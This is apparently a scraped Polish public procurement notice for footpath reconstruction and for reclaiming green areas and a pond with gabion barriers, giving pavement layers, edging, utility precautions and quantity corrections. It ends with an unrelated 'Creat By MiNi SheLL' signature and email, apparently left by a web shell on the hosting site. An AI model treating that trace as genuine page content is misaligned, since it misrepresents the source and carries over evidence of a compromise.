Ze względu na charakter inwestycji, jakim jest przebudowa na większości odcinka geometria została dostosowana do istniejącego zagospodarowania terenu oraz dostępności terenu (w tym własności działek).

Chodnik i alejki w planie będą posiadały układ zbliżony do istniejącego. 
Pochylenie podłużne chodników nie powinno przekraczać 6%. 

Układ wysokościowy został rozwiązany z uwzględnieniem poziomów terenów przyległych, istniejącej zabudowy i uzbrojenia podziemnego. 
Nawierzchnia chodnika będzie posiadała spadek poprzeczny od 1% do 2% w kierunku nawierzchni. Dla odcinków bezpośrednio przyległych do zieleńców spadek poprzeczny należy ukształtować w kierunku przyległych terenów. 

W przypadku dużych różnic wysokości pomiędzy projektowaną nawierzchnią a terenem istniejącym możliwa jest korekta układu wysokościowego ciągów pieszych (niweleta i spadki poprzeczne) w celu prawidłowego dowiązania go do istniejącego terenu. 

Szczegółowe rozwiązania geometryczne pokazane są na projekcie zagospodarowania terenu, szkicu tyczenia i przekroju konstrukcyjno-normalnym.

ODWODNIENIE 
Nawierzchnie alejek należy wykonać, stosując spadki gwarantujące sprawne odprowadzenie wód opadowych. 

Wody opadowe będą odprowadzone powierzchniowo na przyległe zieleńce.

PROJEKTOWANA KONSTRUKCJA NAWIERZCHNI
Konstrukcja nawierzchni ścieżki pieszej
- warstwa ścieralna z kostki betonowej niefazowanej w kolorze szarym (cegła) 	-   8.0 cm
- podsypka cementowo - piaskowa 1:4						-   3.0 cm
- podbudowa z kruszywa łamanego 0/31.5 stabilizowanego mech.			-  15.0 cm
ilość ścieżek do wykonania 220 mb - szerokość 2,00 m

Konstrukcja nawierzchni ścieżki pieszojezdnej
- warstwa ścieralna z kostki betonowej niefazowanej w kolorze szarym (cegła) 	-   8.0 cm
- podsypka cementowo - piaskowa 1:4						-   3.0 cm
- Podbudowa betonowa z dylatacja - grubość warstwy po zagęszczeniu 		- 12.0 cm 
ilość ścieżek do wykonania 400 mb - szerokość 4,00 m

Konstrukcja obrzeży
W krawędzi chodników i alejek należy wykonać obrzeża 8x30x100 cm ustawione na podsypce cementowo piaskowej grubości 5 cm. Ze względu na odprowadzenie wody obrzeża wykonać równo z nawierzchnią chodników, ścieżki i ciągu, lecz wyniesione co najmniej +5cm ponad przyległe tereny. W miejscach gdzie zieleńce są znacznie wyniesione ponad istniejącą nawierzchnie dopuszcza się ustawienie obrzeża ponad projektowane nawierzchnie pod warunkiem sprawnego odprowadzenia wód opadowych.

ROBOTY ZIEMNE
Podczas realizacji inwestycji wystąpią roboty ziemne jako wykopy i korytowanie pod nowe konstrukcje nawierzchni chodnika.
Roboty ziemne, w rejonie przebiegu ciągów kablowych energetycznych oraz sieci wodociągowych i kanalizacyjnych należy wykonać pod nadzorem służb odpowiednich gestorów.
W miejscach występowania trawników wykonawca robót drogowych pozostawi teren obniżony o min. 10 cm w celu wypełnienia glebą urodzajną i obsiania trawą.
Podczas prowadzenia robót należy zabezpieczyć widoczną armaturę uzbrojenia podziemnego (np. włazy kanalizacyjne, zasuwy i studnie telekomunikacyjne) przed uszkodzeniem lub zniszczeniem.
Podczas prowadzenia robót należy zabezpieczyć przyległe tereny zielone przed zniszczeniem, albo odtworzyć je po zakończeniu robót.

KOLIZJE
Kolizje branży energetycznej

Przebudowa chodnika i pozostałych elementów, może wymagać zabezpieczenia istniejącego kabla energetycznego. Rozwiązania techniczne ewentualnej przebudowy i zabezpieczenia linii energetycznej należy wykonać zgodnie z zaleceniami gestora sieci.

Kolizje branży wodociągowej 
Przebudowa chodnika i pozostałych elementów, może wymagać zabezpieczenia istniejącej sieci wodociągowej. Rozwiązania techniczne ewentualnej przebudowy i zabezpieczenia sieci wodociągowej należy wykonać zgodnie z zaleceniami gestora sieci.

Uwaga:
W miejscach zbliżenia do istniejącego uzbrojenia roboty należy wykonywać ręcznie bez użycia sprzętu ciężkiego.

W trakcie prowadzenia robót należy sprawdzić metodą odkrywkową stan zabezpieczenia uzbrojenia podziemnego (kable energetyczne, sieć teletechniczna) przebiegającego pod powierzchnią zjazdów, miejsc postojowych, nawierzchni jezdni. 
W przypadku stwierdzenia nienależytego zabezpieczenia uzbrojenia należy w uzgodnieniu i pod nadzorem gestora sieci wykonać roboty dodatkowe mające na celu właściwe zabezpieczenie w/w uzbrojenia. Prace te wymagają akceptacji nadzoru inwestorskiego.

Kontroli odkrywkowej i ewentualnego zabezpieczenia wymagać będzie następujące uzbrojenie: 
- kable energetyczne 
- sieć wodociągowa
Wszelkie prace przy uzbrojeniu terenu wymagają wcześniejszego zgłoszenia gestorowi sieci oraz bieżącego nadzoru wyznaczonego pracownika właściciela uzbrojenia.
Szerokość ścieżki północnej na całej długości została poszerzona do 4 m. Przewiduje się na niej sporadyczny ruch samochodowy (w tym samochodów ciężarowych). W związku z tym podbudowę należy wzmocnić np. warstwą suchego betonu.

Zamawiający załączył przedmiar robót w którym należy zmienić wartości w pozycjach:
Poz. 7 d.2 - pominąć
Poz. 8 d. 2 - pominąć
Poz. 10 d.2 - pominąć
Poz. 12 d.2  - do skorygowania w związku ze zmniejszonym zakresem robót o poz. 8 i 10 d.2
Poz. 13 d.3 - 	zamiast 380 należy przyjąć 400
		zamiast 629 należy przyjąć 220
Poz. 14 d.3 - należy skorygować do ilości ścieżek wg wskazań w poz. 13 d.3
Poz. 19 d.5 - zamiast krawężników należy przyjąć 800 m obrzeży betonowych 30 x 8
Poz. 20 d.5 - zamiast 629 należy przyjąć 220
Poz. 21 d.5 - zamiast 629 należy przyjąć 220
Poz. 22 d.5 - zamiast 2778 należy przyjąć 2040
Poz. 24 d.6 - zamiast 1600 należy przyjąć 620
Poz. 25 d.6 - zamiast 1600 należy przyjąć 620
Poz. 26 d.7 - zamiast 38 należy przyjąć 10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.00-1, 45.23.31.61-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Rekultywacja terenów zielonych wraz z czaszą zbiornika.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2
Rekultywacja terenów zielonych
Zakres inwestycji obejmuje wyrównanie terenów zielonych wokół ścieżek i obsianie ich trawą parkową, w sumie ok 2 500 m2. Do wykonania są nasadzenia drzew iglastych o wysokości min 1,5 m w ilości 58 sztuk. 

Rekultywacja czaszy stawu
Zakres inwestycji obejmuje wykonanie przegród gabionowych poprzez ustawienie trzech linii gabionów (koszy siatkowo-kamiennych) w czaszy stawu. 

Pierwsza linia gabionów (oznaczona jako A) zlokalizowana ok. 28m poniżej wlotu rzeki Olechówki do Stawów utworzy osadnik, w którym będzie zatrzymywane rumowisko dostarczane do zbiornika z wodami rzeki Olechówki. Korona przegrody będzie zlokalizowana 10cm poniżej lustra wody przy Normalnym Poziomie Piętrzenia (NPP=186,05 m npm), co zapewni swobodny przepływ wody ponad nią. 

Druga i trzecia linia gabionów B i C oraz D i E (między którymi przestrzeń będzie zasypana gruntem) będzie tworzyć wypłycenie dla roślinności szuwarowej. 
Dolna powierzchnia (spód) gabionów będzie zagłębiona ok 0,5m-1,5m poniżej dna stawu. Górna powierzchnia gabionów (korona) będzie znajdować się poniżej lustra wody w stawie. Dla pierwszej linii gabionów zagłębienie poniżej lustra wody w stawie (NPP = 186,05 m npm) będzie wynosić 10cm (rzędna korony gabionów będzie wynosić 185,95 m npm), dla drugiej 25cm (185,80 m npm), a dla trzeciej 35cm (185.70 m npm). 

Ponadto w ramach przedsięwzięcia zostanie utworzona dolomitowa struktura geochemiczna, która będzie się składać z kamienia dolomitowego ułożonego na dnie stawu pomiędzy pierwszą (A) i drugą (B) linią gabionów. Projektowana ilość kamienia do ułożenia w dnie jest niewielka i wynosi ok. 1kg/m2 powierzchni stawu. 

Dla umożliwienia migracji organizmów wodnych oraz dla sprawnego napełniania i opróżniania czaszy stawu z wody, w przegrodach gabionowych mają zostać wykonane przepusty z rur strukturalnych PP o średnicy 600mm. Przepusty te będą mogły być w zależności od potrzeb zamykane (za pomocą firmowych zaślepek - korków oferowanych przez producentów tego typu rur) w celu uzyskania jak najbardziej wydajnej pracy projektowanego systemu (najlepszego efektu ekologicznego, w tym oczyszczania wody). 

UWAGA:
Inwestor oddaje do dyspozycji wykonawcy kosze (gabiony) oraz kamień hydrotechniczny do wypełnienia koszy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com